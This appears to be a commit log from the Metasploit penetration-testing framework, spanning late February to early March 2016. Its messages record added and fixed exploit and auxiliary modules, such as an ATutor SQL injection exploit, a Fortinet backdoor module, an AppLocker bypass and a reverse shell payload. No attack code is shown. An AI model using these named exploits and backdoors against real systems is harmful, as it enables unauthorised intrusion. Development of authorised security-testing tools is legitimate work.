Also actually handle the 'Auto' option that we had in the crawler and remove
hardcoded defaults in modules that do not need them.
2016-03-06 22:06:27 -06:00
Brent Cook
a2c3b05416
Land #6405 , prefer default module base class of simply 'Metasploit'
2016-03-06 17:10:55 -06:00
Brent Cook
8faae94338
Land #6592 , make linux/x86/shell_reverse_tcp's shell path configurable and remove shell_reverse_tcp2
2016-03-06 15:33:53 -06:00
Brent Cook
66c697d2e4
Land #6602 , update author info for dahua_dvr_auth_bypass
2016-03-06 15:13:01 -06:00
Brent Cook
4711191def
remove non-specific URL
2016-03-06 15:12:25 -06:00
Brent Cook
a1190f4344
Land #6598 , add post module for setting wallpaper
2016-03-06 15:00:10 -06:00
Brent Cook
86845222ef
add meterpreter platform workaround
2016-03-06 14:51:34 -06:00
Brent Cook
c7c0e12bb3
remove various module hacks for the datastore defaults not preserving types
2016-03-05 23:11:39 -06:00
Meatballs
c7f9fbcdfa
Change to enable/disable
2016-03-06 04:31:24 +00:00
Meatballs
6b510005da
Reverse os checks
2016-03-06 04:31:23 +00:00
Meatballs
0e52fda708
Initial tidy
2016-03-06 04:31:23 +00:00
Fakhri Zulkifli
b1e9f44ca2
IPv6 Neighbor Advertisement Enhancement
...
http://seclists.org/nmap-dev/2011/q2/79
1. Shorten router advertisement payload lifetime.
2. Randomize address prefix.
3. Prevent from getting into default router list.
2016-03-06 03:23:37 +08:00
William Vu
71b034a566
Land #6627 , atutor_sqli regex fix
2016-03-03 16:54:38 -06:00
wchen-r7
ba4e0d304b
Do regex \d+ instead
2016-03-03 11:05:16 -06:00
Brent Cook
d355b0e8b7
update payload sizes
2016-03-02 13:55:32 -06:00
wchen-r7
22b69c8dee
Land #6588 , Add AppLocker Execution Prevention Bypass module
2016-03-01 22:30:23 -06:00
wchen-r7
a798581fa3
Update #get_dotnet_path
2016-03-01 22:25:40 -06:00
net-ninja
cda4c6b3b3
Update the regex for the number of students in ATutor
2016-03-01 09:41:17 -06:00
rwhitcroft
ded5b58733
one more style fix
2016-03-01 10:20:39 -05:00
rwhitcroft
4b10331cf0
style fixups
2016-03-01 10:18:25 -05:00
wchen-r7
5d64346a63
Land #6623 , Add CVE-2016-2555: ATutor 2.2.1 SQL Injection Exploit Module
2016-02-29 19:33:25 -06:00
Jay Turla
62a611a472
Adding PHP Utility Belt Remote Code Execution
2016-03-01 09:22:25 +08:00
wchen-r7
274b9acb75
rm #push
2016-02-29 18:58:05 -06:00
wchen-r7
f55835cceb
Merge new code changes from mr_me
2016-02-29 18:39:52 -06:00
wchen-r7
638d91197e
Override print_* to always print the IP and port
2016-02-29 16:18:03 -06:00
wchen-r7
54ede19150
Use FileDropper to cleanup
2016-02-29 16:15:50 -06:00
wchen-r7
727a119e5b
Report cred
2016-02-29 16:06:31 -06:00
wchen-r7
4cc690fd8d
Let the user specify username/password
2016-02-29 15:45:33 -06:00
wchen-r7
726c1c8d1e
There is no http_send_command, so I guess the check should not work
2016-02-29 15:43:47 -06:00
William Vu
c5a9d59455
Land #6612 , one final missing change
2016-02-29 15:08:42 -06:00
William Vu
cb0493e5bb
Recreate Msf::Exploit::Remote::Fortinet
...
To match the path, even though it's kinda lame including it just for the
monkeypatch.
2016-02-29 15:04:02 -06:00
net-ninja
a3fa57c8f6
Add CVE-2016-2555: ATutor 2.2.1 SQL Injection Exploit Module
2016-02-29 14:59:26 -06:00
Brent Cook
8c2ce9687a
Land #6620 , fix typo in jtr_linux
2016-02-29 14:58:58 -06:00
Brent Cook
d955c6a8f6
style fixes
2016-02-29 14:06:49 -06:00
William Vu
a6a37b3089
Land #6612 , missing commits included
2016-02-29 14:06:21 -06:00
wchen-r7
f5ad1286d2
Fix #6615 , fix typo "format"
...
Fix #6615
2016-02-29 12:44:25 -06:00
William Vu
300fdc87bb
Move Fortinet backdoor to module and library
2016-02-29 12:06:33 -06:00
wchen-r7
2950996cb8
Land #6612 , Add aux module for Fortinet backdoor
2016-02-29 12:02:49 -06:00
William Vu
53d703355f
Move Fortinet backdoor to module and library
2016-02-29 11:57:42 -06:00
rwhitcroft
f735a904ff
create owa_ews_login module, modify HttpClient to accept preferred_auth option
2016-02-28 22:01:05 -05:00
wchen-r7
53ff3051e1
Land #6531 , NETGEAR ProSafe Network Management System 300 auth'd File Download
2016-02-26 10:53:16 -06:00
wchen-r7
bc050410a6
Allow max traversal depth as an option, and report cred
2016-02-26 10:52:30 -06:00
wchen-r7
7731fbf48f
Land #6530 , NETGEAR ProSafe Network Management System 300 File Upload
2016-02-26 10:39:09 -06:00
Brent Cook
89b0c8a27a
Land #6571 , use intent to unlock Android screens, support <= 4.3
2016-02-26 05:55:35 -06:00
wchen-r7
6188da054d
Remove //
2016-02-25 22:20:48 -06:00
wchen-r7
051506694f
Land #6574 , add Linknat Vos Manager Traversal aux module
2016-02-25 22:02:56 -06:00
wchen-r7
f3cf5a8a41
Resolve merge conflict with upstream-master
...
Out of date author field
2016-02-25 14:49:53 -06:00
wchen-r7
d14ec657e2
Land #6564 , Add Apache Karaf Command Execution Module
2016-02-25 14:47:40 -06:00
wchen-r7
1d2ec7a239
Rescue OpenSSL::Cipher::CipherError
...
Our current net/ssh library is out of date, so we need to rescue
OpenSSL::Cipher::CipherError.
2016-02-25 14:46:53 -06:00
wchen-r7
2e268a25da
Land #6596 , Apache Karaf Login Utility
2016-02-25 14:39:51 -06:00
wchen-r7
aa7c3f01a8
Update name and description
2016-02-25 14:39:19 -06:00
wchen-r7
7e25c7b87b
Handle OpenSSL::Cipher::CipherError
...
Our current net/ssh is petty outdated, so it is possible not being
able to connect to certain SSH servers.
2016-02-25 14:35:37 -06:00
William Vu
7d20e26a35
Move to aux/scanner/ssh
2016-02-25 11:22:50 -06:00
William Vu
f52f44cde0
Remove session_setup, since we're not in a shell
...
A real shell. A real human bean.
2016-02-25 11:21:45 -06:00
nixawk
6ef4026698
get_ptr - save_note(ip, 'get_ptr', records)
2016-02-25 21:43:13 +08:00
nixawk
dfff94a243
save ip/domain relationships
2016-02-25 21:14:40 +08:00
Tyler Bennett
ff3a554b4d
added an unless to wrap around the print and report_creds func for nas module to only execute if ftpuser and ftppass is non-blank
2016-02-24 13:53:30 -05:00
Tyler Bennett
16d7b2e6ff
cleaned up unless code for nas module and setup ftpuser and ftppass to only if non blank
2016-02-23 17:37:47 -05:00
dmohanty-r7
6aa6280eff
Try USERNAME before DEFAULTCRED
2016-02-23 13:44:44 -06:00
Tyler Bennett
4eabe43273
fixed issues with capturing regex
2016-02-23 12:27:07 -05:00
Tyler Bennett
c191e5b8e1
corrected authors file and cleaned up debug statements
2016-02-23 11:41:12 -05:00
Jon Hart
c79eab2c7f
Land #6241 , @talos-arch3y's aux module for Dahua DVR CVE-2013-6117
2016-02-23 08:20:54 -08:00
nixawk
f0da8e9adf
bing_search - ConnectionTimeout
2016-02-23 18:56:34 +08:00
Pedro Ribeiro
5710c85a9e
Style changes
2016-02-23 15:15:57 +07:00
Pedro Ribeiro
044b12d3a4
Made style changes requested by OJ and others
2016-02-23 15:14:04 +07:00
dmohanty-r7
07ac13326e
Allow user to try other login credentials
2016-02-22 17:47:32 -06:00